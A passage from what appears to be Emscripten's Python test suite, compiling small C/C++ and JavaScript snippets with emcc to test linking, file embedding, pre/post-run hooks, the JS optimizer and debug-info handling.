open(os.path.join(self.get_dir(), 'foobar.xxx'), 'w').write('int main(){ return 0; }')
os.symlink(os.path.join(self.get_dir(), 'foobar.xxx'), os.path.join(self.get_dir(), 'foobar.c'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foobar.c'), '-o', os.path.join(self.get_dir(), 'foobar')], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar.xxx'))
try_delete(os.path.join(self.get_dir(), 'foobar.c'))
open(os.path.join(self.get_dir(), 'foobar.c'), 'w').write('int main(){ return 0; }')
os.symlink(os.path.join(self.get_dir(), 'foobar.c'), os.path.join(self.get_dir(), 'foobar.xxx'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foobar.xxx'), '-o', os.path.join(self.get_dir(), 'foobar')], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar.xxx'))
try_delete(os.path.join(self.get_dir(), 'foobar.c'))
def test_multiply_defined_libsymbols(self):
lib = "int mult() { return 1; }"
lib_name = os.path.join(self.get_dir(), 'libA.c')
open(lib_name, 'w').write(lib)
a2 = "void x() {}"
a2_name = os.path.join(self.get_dir(), 'a2.c')
open(a2_name, 'w').write(a2)
b2 = "void y() {}"
b2_name = os.path.join(self.get_dir(), 'b2.c')
open(b2_name, 'w').write(b2)
main = r'''
#include <stdio.h>
int mult();
int main() {
printf("result: %d\n", mult());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(lib_name, output_filename='libA.so')
Building.emcc(a2_name, ['-L.', '-lA'])
Building.emcc(b2_name, ['-L.', '-lA'])
Building.emcc(main_name, ['-L.', '-lA', a2_name+'.o', b2_name+'.o'], output_filename='a.out.js')
self.assertContained('result: 1', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_multiply_defined_libsymbols_2(self):
a = "int x() { return 55; }"
a_name = os.path.join(self.get_dir(), 'a.c')
open(a_name, 'w').write(a)
b = "int y() { return 2; }"
b_name = os.path.join(self.get_dir(), 'b.c')
open(b_name, 'w').write(b)
c = "int z() { return 5; }"
c_name = os.path.join(self.get_dir(), 'c.c')
open(c_name, 'w').write(c)
main = r'''
#include <stdio.h>
int x();
int y();
int z();
int main() {
printf("result: %d\n", x() + y() + z());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(a_name) # a.c.o
Building.emcc(b_name) # b.c.o
Building.emcc(c_name) # c.c.o
lib_name = os.path.join(self.get_dir(), 'libLIB.a')
Building.emar('cr', lib_name, [a_name + '.o', b_name + '.o']) # libLIB.a with a and b
# a is in the lib AND in an .o, so should be ignored in the lib. We do still need b from the lib though
Building.emcc(main_name, ['-L.', '-lLIB', a_name+'.o', c_name + '.o'], output_filename='a.out.js')
self.assertContained('result: 62', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_redundant_link(self):
lib = "int mult() { return 1; }"
lib_name = os.path.join(self.get_dir(), 'libA.c')
open(lib_name, 'w').write(lib)
main = r'''
#include <stdio.h>
int mult();
int main() {
printf("result: %d\n", mult());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(lib_name, output_filename='libA.so')
Building.emcc(main_name, ['libA.so']*2, output_filename='a.out.js')
self.assertContained('result: 1', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_export_all(self):
lib = r'''
#include <stdio.h>
void libf1() { printf("libf1\n"); }
void libf2() { printf("libf2\n"); }
'''
lib_name = os.path.join(self.get_dir(), 'lib.c')
open(lib_name, 'w').write(lib)
open('main.js', 'w').write('''
_libf1();
_libf2();
''')
Building.emcc(lib_name, ['-s', 'EXPORT_ALL=1', '--post-js', 'main.js'], output_filename='a.out.js')
self.assertContained('libf1\nlibf2\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_abspaths(self):
# Includes with absolute paths are generally dangerous, things like -I/usr/.. will get to system local headers, not our portable ones.
shutil.copyfile(path_from_root('tests', 'hello_world.c'), 'main.c')
for args, expected in [(['-I/usr/something'], True),
(['-L/usr/something'], True),
(['-Isubdir/something'], False),
(['-Lsubdir/something'], False),
([], False)]:
err = Popen([PYTHON, EMCC, 'main.c'] + args, stderr=PIPE).communicate()[1]
assert ('encountered. If this is to a local system header/library, it may cause problems (local system files make sense for compiling natively on your system, but not necessarily to JavaScript)' in err) == expected, err
def test_local_link(self):
# Linking a local library directly, like /usr/lib/libsomething.so, cannot work of course since it
# doesn't contain bitcode. However, when we see that we should look for a bitcode file for that
# library in the -L paths and system/lib
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
extern void printey();
int main() {
printey();
return 0;
}
''')
try:
os.makedirs(os.path.join(self.get_dir(), 'subdir'));
except:
pass
open(os.path.join(self.get_dir(), 'subdir', 'libfile.so'), 'w').write('this is not llvm bitcode!')
open(os.path.join(self.get_dir(), 'libfile.cpp'), 'w').write('''
#include <stdio.h>
void printey() {
printf("hello from lib\\n");
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'libfile.cpp'), '-o', 'libfile.so']).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), os.path.join(self.get_dir(), 'subdir', 'libfile.so'), '-L.'], stderr=PIPE).communicate()
self.assertContained('hello from lib', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_runtimelink_multi(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('asm does not support runtime linking yet')
if SPIDERMONKEY_ENGINE not in JS_ENGINES: return self.skip('cannot run without spidermonkey due to node limitations')
open('testa.h', 'w').write(r'''
#ifndef _TESTA_H_
#define _TESTA_H_
class TestA {
public:
TestA();
};
#endif
''')
open('testb.h', 'w').write(r'''
#ifndef _TESTB_H_
#define _TESTB_H_
class TestB {
public:
TestB();
};
#endif
''')
open('testa.cpp', 'w').write(r'''
#include <stdio.h>
#include <testa.h>
TestA::TestA() {
printf("TestA\n");
}
''')
open('testb.cpp', 'w').write(r'''
#include <stdio.h>
#include <testb.h>
#include <testa.h>
/*
*/
TestB::TestB() {
printf("TestB\n");
TestA* testa = new TestA();
}
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <testa.h>
#include <testb.h>
/*
*/
int main(int argc, char** argv) {
printf("Main\n");
TestA* testa = new TestA();
TestB* testb = new TestB();
}
''')
Popen([PYTHON, EMCC, 'testa.cpp', '-o', 'liba.js', '-s', 'BUILD_AS_SHARED_LIB=2', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-I.']).communicate()
Popen([PYTHON, EMCC, 'testb.cpp', '-o', 'libb.js', '-s', 'BUILD_AS_SHARED_LIB=2', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-I.']).communicate()
Popen([PYTHON, EMCC, 'main.cpp', '-o', 'main.js', '-s', 'RUNTIME_LINKED_LIBS=["liba.js", "libb.js"]', '-s', 'NAMED_GLOBALS=1', '-I.', '-s', 'LINKABLE=1']).communicate()
Popen([PYTHON, EMCC, 'main.cpp', 'testa.cpp', 'testb.cpp', '-o', 'full.js', '-I.']).communicate()
self.assertContained('TestA\nTestB\nTestA\n', run_js('main.js', engine=SPIDERMONKEY_ENGINE))
def test_js_libraries(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
extern "C" {
extern void printey();
extern int calcey(int x, int y);
}
int main() {
printey();
printf("*%d*\\n", calcey(10, 22));
return 0;
}
''')
open(os.path.join(self.get_dir(), 'mylib1.js'), 'w').write('''
mergeInto(LibraryManager.library, {
printey: function() {
Module.print('hello from lib!');
}
});
''')
open(os.path.join(self.get_dir(), 'mylib2.js'), 'w').write('''
mergeInto(LibraryManager.library, {
calcey: function(x, y) {
return x + y;
}
});
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'mylib1.js'),
'--js-library', os.path.join(self.get_dir(), 'mylib2.js')]).communicate()
self.assertContained('hello from lib!\n*32*\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_identical_basenames(self):
# Issue 287: files in different dirs but with the same basename get confused as the same,
# causing multiply defined symbol errors
try:
os.makedirs(os.path.join(self.get_dir(), 'foo'));
except:
pass
try:
os.makedirs(os.path.join(self.get_dir(), 'bar'));
except:
pass
open(os.path.join(self.get_dir(), 'foo', 'main.cpp'), 'w').write('''
extern void printey();
int main() {
printey();
return 0;
}
''')
open(os.path.join(self.get_dir(), 'bar', 'main.cpp'), 'w').write('''
#include<stdio.h>
void printey() { printf("hello there\\n"); }
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo', 'main.cpp'), os.path.join(self.get_dir(), 'bar', 'main.cpp')]).communicate()
self.assertContained('hello there', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# ditto with first creating .o files
try_delete(os.path.join(self.get_dir(), 'a.out.js'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo', 'main.cpp'), '-o', os.path.join(self.get_dir(), 'foo', 'main.o')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'bar', 'main.cpp'), '-o', os.path.join(self.get_dir(), 'bar', 'main.o')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo', 'main.o'), os.path.join(self.get_dir(), 'bar', 'main.o')]).communicate()
self.assertContained('hello there', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_main_a(self):
# if main() is in a .a, we need to pull in that .a
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(r'''
#include <stdio.h>
extern int f();
int main() {
printf("result: %d.\n", f());
return 0;
}
''')
other_name = os.path.join(self.get_dir(), 'other.c')
open(other_name, 'w').write(r'''
#include <stdio.h>
int f() { return 12346; }
''')
Popen([PYTHON, EMCC, main_name, '-c', '-o', main_name+'.bc']).communicate()
Popen([PYTHON, EMCC, other_name, '-c', '-o', other_name+'.bc']).communicate()
Popen([PYTHON, EMAR, 'cr', main_name+'.a', main_name+'.bc']).communicate()
Popen([PYTHON, EMCC, other_name+'.bc', main_name+'.a']).communicate()
self.assertContained('result: 12346.', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_dup_o_in_a(self):
open('common.c', 'w').write(r'''
#include <stdio.h>
void a(void) {
printf("a\n");
}
''')
Popen([PYTHON, EMCC, 'common.c', '-c', '-o', 'common.o']).communicate()
Popen([PYTHON, EMAR, 'rc', 'liba.a', 'common.o']).communicate()
open('common.c', 'w').write(r'''
#include <stdio.h>
void b(void) {
printf("b\n");
}
''')
Popen([PYTHON, EMCC, 'common.c', '-c', '-o', 'common.o']).communicate()
Popen([PYTHON, EMAR, 'rc', 'libb.a', 'common.o']).communicate()
open('main.c', 'w').write(r'''
void a(void);
void b(void);
int main() {
a();
b();
}
''')
Popen([PYTHON, EMCC, 'main.c', '-L.', '-la', '-lb']).communicate()
self.assertContained('a\nb\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_embed_file(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''hello from a file with lots of data and stuff in it thank you very much''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
int main() {
FILE *f = fopen("somefile.txt", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--embed-file', 'somefile.txt']).communicate()
self.assertContained('|hello from a file wi|', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# preload twice, should not err
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--embed-file', 'somefile.txt', '--embed-file', 'somefile.txt']).communicate()
self.assertContained('|hello from a file wi|', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_embed_file_dup(self):
try_delete(os.path.join(self.get_dir(), 'tst'))
os.mkdir(os.path.join(self.get_dir(), 'tst'))
os.mkdir(os.path.join(self.get_dir(), 'tst', 'test1'))
os.mkdir(os.path.join(self.get_dir(), 'tst', 'test2'))
open(os.path.join(self.get_dir(), 'tst', 'aa.txt'), 'w').write('''frist''')
open(os.path.join(self.get_dir(), 'tst', 'test1', 'aa.txt'), 'w').write('''sacond''')
open(os.path.join(self.get_dir(), 'tst', 'test2', 'aa.txt'), 'w').write('''thard''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
#include <string.h>
void print_file(const char *name) {
FILE *f = fopen(name, "r");
char buf[100];
memset(buf, 0, 100);
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
}
int main() {
print_file("tst/aa.txt");
print_file("tst/test1/aa.txt");
print_file("tst/test2/aa.txt");
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--embed-file', 'tst']).communicate()
self.assertContained('|frist|\n|sacond|\n|thard|\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_multidynamic_link(self):
# Linking the same dynamic library in will error, normally, since we statically link it, causing dupe symbols
# A workaround is to use --ignore-dynamic-linking, see emcc --help for details
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
extern void printey();
extern void printother();
int main() {
printf("*");
printey();
printf("\n");
printother();
printf("\n");
printf("*");
return 0;
}
''')
try:
os.makedirs(os.path.join(self.get_dir(), 'libdir'));
except:
pass
open(os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), 'w').write('''
#include <stdio.h>
void printey() {
printf("hello from lib");
}
''')
open(os.path.join(self.get_dir(), 'libdir', 'libother.cpp'), 'w').write('''
#include <stdio.h>
extern void printey();
void printother() {
printf("|");
printey();
printf("|");
}
''')
# This lets us link the same dynamic lib twice. We will need to link it in manually at the end.
compiler = [PYTHON, EMCC, '--ignore-dynamic-linking']
# Build libfile normally into an .so
Popen(compiler + [os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), '-o', os.path.join(self.get_dir(), 'libdir', 'libfile.so')]).communicate()
# Build libother and dynamically link it to libfile - but add --ignore-dynamic-linking
Popen(compiler + [os.path.join(self.get_dir(), 'libdir', 'libother.cpp'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile', '-o', os.path.join(self.get_dir(), 'libdir', 'libother.so')]).communicate()
# Build the main file, linking in both the libs
Popen(compiler + [os.path.join(self.get_dir(), 'main.cpp'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile', '-lother', '-c']).communicate()
# The normal build system is over. We need to do an additional step to link in the dynamic libraries, since we ignored them before
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.o'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile', '-lother']).communicate()
self.assertContained('*hello from lib\n|hello from lib|\n*', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_js_link(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'before.js'), 'w').write('''
var MESSAGE = 'hello from js';
if (typeof Module != 'undefined') throw 'This code should run before anything else!';
''')
open(os.path.join(self.get_dir(), 'after.js'), 'w').write('''
Module.print(MESSAGE);
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'before.js', '--post-js', 'after.js']).communicate()
self.assertContained('hello from main\nhello from js\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_sdl_endianness(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
#include <SDL/SDL.h>
int main() {
printf("%d, %d, %d\n", SDL_BYTEORDER, SDL_LIL_ENDIAN, SDL_BIG_ENDIAN);
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')]).communicate()
self.assertContained('1234, 1234, 4321\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_link_memcpy(self):
# memcpy can show up *after* optimizations, so after our opportunity to link in libc, so it must be special-cased
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
int main(int argc, char **argv) {
int num = argc + 10;
char buf[num], buf2[num];
for (int i = 0; i < num; i++) {
buf[i] = i*i+i/3;
}
for (int i = 1; i < num; i++) {
buf[i] += buf[i-1];
}
for (int i = 0; i < num; i++) {
buf2[i] = buf[i];
}
for (int i = 1; i < num; i++) {
buf2[i] += buf2[i-1];
}
for (int i = 0; i < num; i++) {
printf("%d:%d\n", i, buf2[i]);
}
return 0;
}
''')
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'main.cpp')]).communicate()
output = run_js(os.path.join(self.get_dir(), 'a.out.js'), full_output=True, stderr=PIPE)
self.assertContained('''0:0
1:1
2:6
3:21
4:53
5:111
6:-49
7:98
8:55
9:96
10:-16
''', output)
self.assertNotContained('warning: library.js memcpy should not be running, it is only for testing!', output)
def test_warn_undefined(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
extern "C" {
void something();
}
int main() {
something();
return 0;
}
''')
def clear(): try_delete('a.out.js')
for args in [[], ['-O2']]:
clear()
print 'warn', args
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-s', 'WARN_ON_UNDEFINED_SYMBOLS=1'] + args, stderr=PIPE).communicate()
self.assertContained('unresolved symbol: something', output[1])
clear()
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')] + args, stderr=PIPE).communicate()
self.assertNotContained('unresolved symbol: something\n', output[1])
for args in [[], ['-O2']]:
clear()
print 'error', args
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'] + args, stderr=PIPE).communicate()
self.assertContained('unresolved symbol: something', output[1])
assert not os.path.exists('a.out.js')
clear()
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')] + args, stderr=PIPE).communicate()
self.assertNotContained('unresolved symbol: something\n', output[1])
assert os.path.exists('a.out.js')
def test_toobig(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
#define BYTES 100*1024*1024
int main(int argc, char **argv) {
if (argc == 100) {
static char buf[BYTES];
static char buf2[BYTES];
for (int i = 0; i < BYTES; i++) {
buf[i] = i*i;
buf2[i] = i/3;
}
for (int i = 0; i < BYTES; i++) {
buf[i] = buf2[i/2];
buf2[i] = buf[i/3];
}
printf("%d\n", buf[10] + buf2[20]);
}
return 0;
}
''')
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')], stderr=PIPE).communicate()[1]
assert 'Emscripten failed' in output, output
assert 'warning: very large fixed-size structural type' in output, output
def test_prepost(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: function() { Module.print('pre-run') },
postRun: function() { Module.print('post-run') }
};
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js']).communicate()
self.assertContained('pre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# never run, so no preRun or postRun
src = open(os.path.join(self.get_dir(), 'a.out.js')).read().replace('// {{PRE_RUN_ADDITIONS}}', 'addRunDependency()')
open(os.path.join(self.get_dir(), 'a.out.js'), 'w').write(src)
self.assertNotContained('pre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# noInitialRun prevents run
for no_initial_run, run_dep in [(0, 0), (1, 0), (0, 1)]:
print no_initial_run, run_dep
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')]).communicate()
src = 'var Module = { noInitialRun: %d };\n' % no_initial_run + open(os.path.join(self.get_dir(), 'a.out.js')).read()
if run_dep:
src = src.replace('// {{PRE_RUN_ADDITIONS}}', '// {{PRE_RUN_ADDITIONS}}\naddRunDependency("test");') \
.replace('// {{POST_RUN_ADDITIONS}}', '// {{POST_RUN_ADDITIONS}}\nremoveRunDependency("test");')
open(os.path.join(self.get_dir(), 'a.out.js'), 'w').write(src)
assert ('hello from main' in run_js(os.path.join(self.get_dir(), 'a.out.js'))) != no_initial_run, 'only run if no noInitialRun'
if no_initial_run:
# Calling main later should still work, filesystem etc. must be set up.
print 'call main later'
src = open(os.path.join(self.get_dir(), 'a.out.js')).read() + '\nModule.callMain();\n';
open(os.path.join(self.get_dir(), 'a.out.js'), 'w').write(src)
assert 'hello from main' in run_js(os.path.join(self.get_dir(), 'a.out.js')), 'main should print when called manually'
# Use postInit
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: function() { Module.print('pre-run') },
postRun: function() { Module.print('post-run') },
preInit: function() { Module.print('pre-init') }
};
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js']).communicate()
self.assertContained('pre-init\npre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_prepost2(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: function() { Module.print('pre-run') },
};
''')
open(os.path.join(self.get_dir(), 'pre2.js'), 'w').write('''
Module.postRun = function() { Module.print('post-run') };
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '--pre-js', 'pre2.js']).communicate()
self.assertContained('pre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_prepre(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: [function() { Module.print('pre-run') }],
};
''')
open(os.path.join(self.get_dir(), 'pre2.js'), 'w').write('''
Module.preRun.push(function() { Module.print('prepre') });
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '--pre-js', 'pre2.js']).communicate()
self.assertContained('prepre\npre-run\nhello from main\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_save_bc(self):
for save in [0, 1]:
self.clear()
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_loop_malloc.cpp')] + ([] if not save else ['--save-bc', self.in_dir('my_bitcode.bc')])).communicate()
assert 'hello, world!' in run_js(self.in_dir('a.out.js'))
assert os.path.exists(self.in_dir('my_bitcode.bc')) == save
if save:
try_delete('a.out.js')
Building.llvm_dis(self.in_dir('my_bitcode.bc'), self.in_dir('my_ll.ll'))
try:
os.environ['EMCC_LEAVE_INPUTS_RAW'] = '1'
Popen([PYTHON, EMCC, 'my_ll.ll', '-o', 'two.js']).communicate()
assert 'hello, world!' in run_js(self.in_dir('two.js'))
finally:
del os.environ['EMCC_LEAVE_INPUTS_RAW']
def test_fix_closure(self):
input = path_from_root('tests', 'test-fix-closure.js')
expected = path_from_root('tests', 'test-fix-closure.out.js')
Popen([PYTHON, path_from_root('tools', 'fix_closure.py'), input, 'out.js']).communicate(input)
output = open('out.js').read()
assert '0,zzz_Q_39fa,0' in output
assert 'function(a,c)' not in output # should be uninlined, so it gets a name
assert run_js(input) == run_js('out.js')
def test_js_optimizer(self):
for input, expected, passes in [
(path_from_root('tools', 'test-js-optimizer.js'), open(path_from_root('tools', 'test-js-optimizer-output.js')).read(),
['hoistMultiples', 'loopOptimizer', 'removeAssignsToUndefined', 'simplifyExpressionsPre', 'simplifyExpressionsPost']),
(path_from_root('tools', 'test-js-optimizer-t2c.js'), open(path_from_root('tools', 'test-js-optimizer-t2c-output.js')).read(),
['simplifyExpressionsPre', 'optimizeShiftsConservative']),
(path_from_root('tools', 'test-js-optimizer-t2.js'), open(path_from_root('tools', 'test-js-optimizer-t2-output.js')).read(),
['simplifyExpressionsPre', 'optimizeShiftsAggressive']),
# Make sure that optimizeShifts handles functions with shift statements.
(path_from_root('tools', 'test-js-optimizer-t3.js'), open(path_from_root('tools', 'test-js-optimizer-t3-output.js')).read(),
['optimizeShiftsAggressive']),
(path_from_root('tools', 'test-js-optimizer-regs.js'), open(path_from_root('tools', 'test-js-optimizer-regs-output.js')).read(),
['registerize']),
(path_from_root('tools', 'eliminator', 'eliminator-test.js'), open(path_from_root('tools', 'eliminator', 'eliminator-test-output.js')).read(),
['eliminate']),
(path_from_root('tools', 'eliminator', 'safe-eliminator-test.js'), open(path_from_root('tools', 'eliminator', 'safe-eliminator-test-output.js')).read(),
['eliminateMemSafe']),
(path_from_root('tools', 'eliminator', 'asm-eliminator-test.js'), open(path_from_root('tools', 'eliminator', 'asm-eliminator-test-output.js')).read(),
['asm', 'eliminate']),
(path_from_root('tools', 'test-js-optimizer-asm-regs.js'), open(path_from_root('tools', 'test-js-optimizer-asm-regs-output.js')).read(),
['asm', 'registerize']),
(path_from_root('tools', 'test-js-optimizer-asm-regs-min.js'), open(path_from_root('tools', 'test-js-optimizer-asm-regs-min-output.js')).read(),
['asm', 'registerize']),
(path_from_root('tools', 'test-js-optimizer-asm-pre.js'), open(path_from_root('tools', 'test-js-optimizer-asm-pre-output.js')).read(),
['asm', 'simplifyExpressionsPre']),
(path_from_root('tools', 'test-js-optimizer-asm-last.js'), open(path_from_root('tools', 'test-js-optimizer-asm-last-output.js')).read(),
['asm', 'last']),
(path_from_root('tools', 'test-js-optimizer-asm-relocate.js'), open(path_from_root('tools', 'test-js-optimizer-asm-relocate-output.js')).read(),
['asm', 'relocate']),
#(path_from_root('tools', 'test-js-optimizer-asm-outline.js'), open(path_from_root('tools', 'test-js-optimizer-asm-outline-output.js')).read(),
# ['asm', 'outline']),
]:
print input
output = Popen(listify(NODE_JS) + [path_from_root('tools', 'js-optimizer.js'), input] + passes, stdin=PIPE, stdout=PIPE).communicate()[0]
self.assertIdentical(expected, output.replace('\r\n', '\n').replace('\n\n', '\n'))
def test_m_mm(self):
open(os.path.join(self.get_dir(), 'foo.c'), 'w').write('''#include <emscripten.h>''')
for opt in ['M', 'MM']:
output, err = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo.c'), '-' + opt], stdout=PIPE, stderr=PIPE).communicate()
assert 'foo.o: ' in output, '-%s failed to produce the right output: %s' % (opt, output)
assert 'error' not in err, 'Unexpected stderr: ' + err
def test_chunking(self):
if os.environ.get('EMCC_DEBUG'): return self.skip('cannot run in debug mode')
if os.environ.get('EMCC_CORES'): return self.skip('cannot run if cores are altered')
if multiprocessing.cpu_count() < 2: return self.skip('need multiple cores')
try:
os.environ['EMCC_DEBUG'] = '1'
os.environ['EMCC_CORES'] = '2'
for asm, linkable, chunks, js_chunks in [
(0, 0, 3, 2), (0, 1, 3, 4),
(1, 0, 3, 2), (1, 1, 3, 4)
]:
print asm, linkable, chunks, js_chunks
output, err = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_libcxx.cpp'), '-O1', '-s', 'LINKABLE=%d' % linkable, '-s', 'ASM_JS=%d' % asm] + (['-O2'] if asm else []), stdout=PIPE, stderr=PIPE).communicate()
ok = False
for c in range(chunks, chunks+2):
ok = ok or ('phase 2 working on %d chunks' % c in err)
assert ok, err
ok = False
for c in range(js_chunks, js_chunks+2):
ok = ok or ('splitting up js optimization into %d chunks' % c in err)
assert ok, err
finally:
del os.environ['EMCC_DEBUG']
del os.environ['EMCC_CORES']
def test_debuginfo(self):
if os.environ.get('EMCC_DEBUG'): return self.skip('cannot run in debug mode')
try:
os.environ['EMCC_DEBUG'] = '1'
# llvm debug info is kept only when we can see it, which is without the js optimize, -O0. js debug info is lost by registerize in -O2, so - g disables it
for args, expect_llvm, expect_js in [
(['-O0'], True, True),
(['-O0', '-g'], True, True),
(['-O1'], False, True),
(['-O1', '-g'], False, True),
(['-O2'], False, False),
(['-O2', '-g'], False, True),
]:
print args, expect_llvm, expect_js
output, err = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world.cpp')] + args, stdout=PIPE, stderr=PIPE).communicate()
assert expect_llvm == ('strip-debug' not in err)
assert expect_js == ('registerize' not in err)
finally:
del os.environ['EMCC_DEBUG']
def test_scons(self): # also incidentally tests c++11 integration in llvm 3.1
try_delete(os.path.join(self.get_dir(), 'test'))
shutil.copytree(path_from_root('tests', 'scons'), os.path.join(self.get_dir(), 'test'))
shutil.copytree(path_from_root('tools', 'scons', 'site_scons'), os.path.join(self.get_dir(), 'test', 'site_scons'))
os.chdir(os.path.join(self.get_dir(), 'test'))
Popen(['scons']).communicate()
output = run_js('scons_integration.js')
assert 'If you see this - the world is all right!' in output
def test_embind(self):
for args, fail in [
([], True), # without --bind, we fail
(['--bind'], False),
(['--bind', '-O1'], False),
(['--bind', '-O2'], False)
]:
print args, fail
self.clear()
try_delete(self.in_dir('a.out.js'))
